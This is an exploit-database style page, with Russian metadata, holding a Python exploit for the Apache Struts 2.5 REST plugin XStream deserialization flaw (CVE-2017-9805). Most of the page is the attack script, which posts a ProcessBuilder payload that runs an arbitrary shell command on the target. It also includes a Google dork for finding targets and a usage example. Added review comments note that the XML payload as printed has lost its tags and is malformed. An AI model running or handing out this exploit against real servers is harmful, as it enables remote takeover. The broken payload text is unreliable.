Apache Struts 2.5 - Remote Code Execution

Свойства

Дата публикации:
07.09.2017
Цель:
Apache Struts 2.5 – 2.5.12 (REST-плагин, CVE-2017-9805)
Тип воздействия:
Компрометация системы

Код

# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
# Google Dork: filetype:action
# Date: 06/09/2017
# Exploit Author: Warflop
# Vendor Homepage: https://struts.apache.org/
# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
# Version: Struts 2.5 – Struts 2.5.12
# Tested on: Struts 2.5.10
# CVE : 2017-9805
 
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# Struts CVE-2017-9805 Exploit
# Warflop (http://securityattack.com.br/)
# Greetz: Pimps & G4mbl3r
# *****************************************************
import sys
from xml.sax.saxutils import escape

import requests
 
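def exploration(command, url=None, timeout=30):
    """POST the CVE-2017-9805 XStream payload to a Struts REST-plugin action.

    The REST plugin hands an ``application/xml`` request body to XStream,
    which deserializes it; the payload below carries a
    ``java.lang.ProcessBuilder`` gadget whose argument list is
    ``/bin/sh -c <command>``, so the command runs on the target.

    Args:
        command: shell command placed into the payload. It sits inside an
            XML text node, so XML metacharacters (``<``, ``>``, ``&``) are
            escaped here; the original spliced it in raw, which produced a
            malformed document for any command containing e.g. ``&&``.
        url: URL of a REST-plugin action. ``None`` (the default) keeps the
            original CLI behaviour and reads ``sys.argv[1]``.
        timeout: seconds to wait for connect/read. The original passed no
            timeout, so an unresponsive host hung the script indefinitely.

    Returns:
        The response body as text (it is also printed, as before).

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    # NOTE(review): as reproduced on this page the payload holds only text
    # nodes (``0``, ``false``, ``java.lang.ProcessBuilder``, ``start``,
    # ``foo`` ...) — no element tags survive. As shown it is therefore not
    # well-formed XStream XML and will not reach the gadget chain; the
    # markup must be restored from the upstream source before relying on it.
    exploit = '''
                
                
                
                0
                
                
                
                
                
                false
                0
                
                
                
                
                
                /bin/sh-c''' + escape(command) + '''
                
                false
                
                
                
                
                java.lang.ProcessBuilder
                start
                
                
                foo
                
                foo
                
                
                
                
                
                false
                0
                0
                false
                
                false
                
                
                
                0
                
                
                
                
                
                
                
                
                
                '''

    if url is None:
        url = sys.argv[1]

    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
        'Content-Type': 'application/xml',
    }

    # The original used Python 2 ``print request.text`` under a python3
    # shebang, which is a SyntaxError on Python 3 and broke the whole file.
    response = requests.post(url, data=exploit, headers=headers, timeout=timeout)
    print(response.text)
    return response.text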
 
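if __name__ == "__main__":
    # CLI entry: struts2.py URL COMMAND. Guarded so importing the module
    # (e.g. to reuse exploration()) no longer fires the request.
    if len(sys.argv) < 3:
        print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
        print ('[*] Warflop - http://securityattack.com.br')
        print ('[*] Greatz: Pimps & G4mbl3r')
        print ('[*] Use: python struts2.py URL COMMAND')
        print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
        # Usage error: exit non-zero via sys.exit. The bare exit() used before
        # is a `site` convenience that is missing under `python -S`, and it
        # reported success (0) for a missing argument.
        sys.exit(1)
    exploration(sys.argv[2])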